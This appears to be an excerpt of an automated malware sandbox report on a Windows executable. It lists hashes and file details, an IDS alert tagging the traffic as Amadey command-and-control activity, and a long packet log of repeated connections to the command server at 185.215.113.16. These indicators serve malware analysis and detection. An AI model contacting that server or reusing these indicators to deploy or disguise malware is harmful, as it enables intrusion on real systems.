                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286
                  Entropy (8bit):3.442417590930785
                  Encrypted:false
                  SSDEEP:6:wvXwpXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lbctyut0:ag1pRKQ1lOmeeDHjzvYRQVYtyut0
                  MD5:0E43DDF646A8A425C508F14A0B8AA20D
                  SHA1:151D532BF065090573041060792C8E40487C8DCC
                  SHA-256:2FDC4E9B7C76D8697D09208EB6959AA58C538C592517C69B6C8B3DA37D6891C4
                  SHA-512:2B5C374B5227BD2DE8EB63D821D5970D803B72C635150E800A167573E54A6C1773A0A22A5D752B023DEB26F48785CCA99FF22A1E68C0937CFE385B27F669FF42
                  Malicious:false
                  Reputation:low
                  Preview:....2.....J._...".9F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................5.@3P.........................
                  File type:
                  Entropy (8bit):7.9503823882866875
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'965'056 bytes
                  MD5:48d34a4ac51f1a89e010b64fa8cfdcc2
                  SHA1:ef2a194fbb28562afc735ae4ee74429521ef9105
                  SHA256:ac848e3af9a5738ef6791dafa2a763a7718c25f1df48a6430827cabe9a5d68f2
                  SHA512:63fd4531148ca40fa60997692a79e678dcbc032153204cbb591831478aaee70cdde3b7568b8fdae12f995beb84c687bbcf23e094b2fa5e588bb531f0f7a50b28
                  SSDEEP:49152:Zzuatph4L2H+Ug2sf77jALl77nXmwDdRAbh0SbTPsAEpKE:duqph4L2exT7MB77nXmwI7cF
                  TLSH:779533E32E2F3326D03CAB7481B77B04A730840D02263B9969E5655FDEF7B052DEA495
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                  Icon Hash:90cececece8e8eb0
                  Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                  2024-09-25T13:53:23.088893+0200 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.4 | 49753 | 185.215.113.16 | 80 | TCP
                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Sep 25, 2024 13:53:09.933976889 CEST8049741185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:10.640786886 CEST8049741185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:10.640870094 CEST4974180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:10.652060032 CEST4974180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:10.656873941 CEST8049741185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:10.884042978 CEST8049741185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:10.884249926 CEST4974180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:10.986959934 CEST4974180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:10.987539053 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:10.992347002 CEST8049741185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:10.992441893 CEST4974180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:10.992501974 CEST8049742185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:10.992575884 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:10.995743990 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:11.000535011 CEST8049742185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:11.691813946 CEST8049742185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:11.691956997 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:11.693386078 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:11.698194981 CEST8049742185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:11.921874046 CEST8049742185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:11.922177076 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.033103943 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.033946037 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.038472891 CEST8049742185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:12.038604021 CEST4974280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.038830996 CEST8049743185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:12.038922071 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.039163113 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.044054031 CEST8049743185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:12.759413004 CEST8049743185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:12.759536028 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.760437012 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:12.765435934 CEST8049743185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:12.988336086 CEST8049743185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:12.988398075 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.097701073 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.098073959 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.104866982 CEST8049743185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:13.104887962 CEST8049744185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:13.104953051 CEST4974380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.104984999 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.105356932 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.110624075 CEST8049744185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:13.814121962 CEST8049744185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:13.814335108 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.815427065 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:13.820493937 CEST8049744185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:14.048032999 CEST8049744185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:14.048542976 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.158240080 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.158849955 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.163872004 CEST8049744185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:14.164006948 CEST8049745185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:14.164067030 CEST4974480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.164117098 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.164294004 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.169553995 CEST8049745185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:14.893877983 CEST8049745185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:14.893997908 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.894581079 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:14.901894093 CEST8049745185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:15.130125999 CEST8049745185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:15.130179882 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.236109018 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.236418009 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.241256952 CEST8049746185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:15.241324902 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.241401911 CEST8049745185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:15.241444111 CEST4974580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.241519928 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.246314049 CEST8049746185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:15.950556040 CEST8049746185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:15.950614929 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.952330112 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:15.969141006 CEST8049746185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:16.188354015 CEST8049746185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:16.188462973 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:16.298511028 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:16.298918009 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:16.304559946 CEST8049748185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:16.304661036 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:16.304754972 CEST8049746185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:16.304799080 CEST4974680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:16.304864883 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:16.311142921 CEST8049748185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:17.025926113 CEST8049748185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:17.026022911 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.026726007 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.031682014 CEST8049748185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:17.256524086 CEST8049748185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:17.256608963 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.361494064 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.361803055 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.366748095 CEST8049748185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:17.366789103 CEST8049749185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:17.366832018 CEST4974880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.366873026 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.367012024 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:17.371942997 CEST8049749185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:18.198535919 CEST8049749185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:18.201421022 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.215010881 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.219824076 CEST8049749185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:18.597012043 CEST8049749185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:18.597192049 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.704695940 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.705008030 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.713455915 CEST8049749185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:18.713505983 CEST8049750185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:18.713624954 CEST4974980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.713692904 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.713906050 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:18.718978882 CEST8049750185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:19.425087929 CEST8049750185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:19.425230026 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:19.426007986 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:19.430939913 CEST8049750185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:19.904092073 CEST8049750185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:19.904361010 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.017366886 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.017664909 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.022624969 CEST8049751185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:20.022749901 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.022785902 CEST8049750185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:20.022846937 CEST4975080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.023060083 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.029567003 CEST8049751185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:20.733767033 CEST8049751185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:20.733865023 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.734658957 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:20.739545107 CEST8049751185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:21.210613012 CEST8049751185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:21.210717916 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:21.313879013 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:21.314176083 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:21.319113970 CEST8049751185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:21.319185019 CEST4975180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:21.319189072 CEST8049752185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:21.319286108 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:21.319447041 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:21.324280977 CEST8049752185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:22.018805981 CEST8049752185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:22.018899918 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.021414995 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.026285887 CEST8049752185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:22.249141932 CEST8049752185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:22.249278069 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.360961914 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.361251116 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.366138935 CEST8049753185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:22.366230965 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.366312981 CEST8049752185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:22.366337061 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.366374969 CEST4975280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:22.371419907 CEST8049753185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:23.088722944 CEST8049753185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:23.088892937 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.089634895 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.096223116 CEST8049753185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:23.324312925 CEST8049753185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:23.324476004 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.439258099 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.439584017 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.621115923 CEST8049754185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:23.621223927 CEST8049753185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:23.621310949 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.621371031 CEST4975380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.621750116 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:23.628943920 CEST8049754185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:24.320278883 CEST8049754185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:24.320369959 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.321151018 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.328648090 CEST8049754185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:24.558545113 CEST8049754185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:24.558684111 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.673469067 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.673875093 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.678992987 CEST8049754185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:24.679125071 CEST4975480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.679230928 CEST8049755185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:24.679332972 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.679474115 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:24.684343100 CEST8049755185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:25.372248888 CEST8049755185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:25.372466087 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.373226881 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.378149033 CEST8049755185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:25.596723080 CEST8049755185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:25.596837044 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.704931974 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.705248117 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.710445881 CEST8049755185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:25.710573912 CEST4975580192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.710763931 CEST8049756185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:25.710860968 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.711108923 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:25.716224909 CEST8049756185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:26.401568890 CEST8049756185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:26.401710033 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.403621912 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.408571005 CEST8049756185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:26.628310919 CEST8049756185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:26.628431082 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.736366987 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.736793041 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.741789103 CEST8049757185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:26.741906881 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.741978884 CEST8049756185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:26.742041111 CEST4975680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.742043972 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:26.747601032 CEST8049757185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:27.479156971 CEST8049757185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:27.479268074 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.480864048 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.485704899 CEST8049757185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:27.704467058 CEST8049757185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:27.704579115 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.814944029 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.815567017 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.820453882 CEST8049758185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:27.820472956 CEST8049757185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:27.820563078 CEST4975780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.820769072 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.820770025 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:27.825633049 CEST8049758185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:28.522046089 CEST8049758185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:28.522155046 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.529462099 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.534665108 CEST8049758185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:28.757508039 CEST8049758185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:28.757615089 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.885833979 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.886176109 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.891084909 CEST8049759185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:28.891289949 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.891338110 CEST8049758185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:28.891403913 CEST4975880192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.891541004 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:28.896377087 CEST8049759185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:29.599926949 CEST8049759185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:29.600073099 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.601567984 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.606457949 CEST8049759185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:29.830955982 CEST8049759185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:29.831247091 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.942995071 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.943802118 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.948643923 CEST8049759185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:29.948688030 CEST8049760185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:29.948712111 CEST4975980192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.948785067 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.948928118 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:29.953850985 CEST8049760185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:30.647969961 CEST8049760185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:30.648056984 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.648828983 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.653606892 CEST8049760185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:30.876790047 CEST8049760185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:30.876873016 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.985940933 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.986382961 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.991142035 CEST8049760185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:30.991219997 CEST4976080192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.991266012 CEST8049761185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:30.991336107 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.991504908 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:30.996326923 CEST8049761185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:31.710169077 CEST8049761185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:31.710310936 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:31.740235090 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:31.745193005 CEST8049761185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:31.969443083 CEST8049761185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:31.969572067 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.095495939 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.095920086 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.100646019 CEST8049761185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:32.100702047 CEST8049762185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:32.100745916 CEST4976180192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.100811958 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.100945950 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.105705023 CEST8049762185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:32.800465107 CEST8049762185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:32.800601959 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.801619053 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:32.806442976 CEST8049762185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:33.030148029 CEST8049762185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:33.030299902 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.142405987 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.143292904 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.152153969 CEST8049762185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:33.152285099 CEST4976280192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.152303934 CEST8049763185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:33.152394056 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.152729034 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.162602901 CEST8049763185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:33.843264103 CEST8049763185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:33.843348980 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.844074965 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:33.848964930 CEST8049763185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:34.071610928 CEST8049763185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:34.071683884 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.173971891 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.174356937 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.179213047 CEST8049764185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:34.179279089 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.179425001 CEST4976480192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.179476023 CEST8049763185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:34.179528952 CEST4976380192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:34.184334040 CEST8049764185.215.113.16192.168.2.4
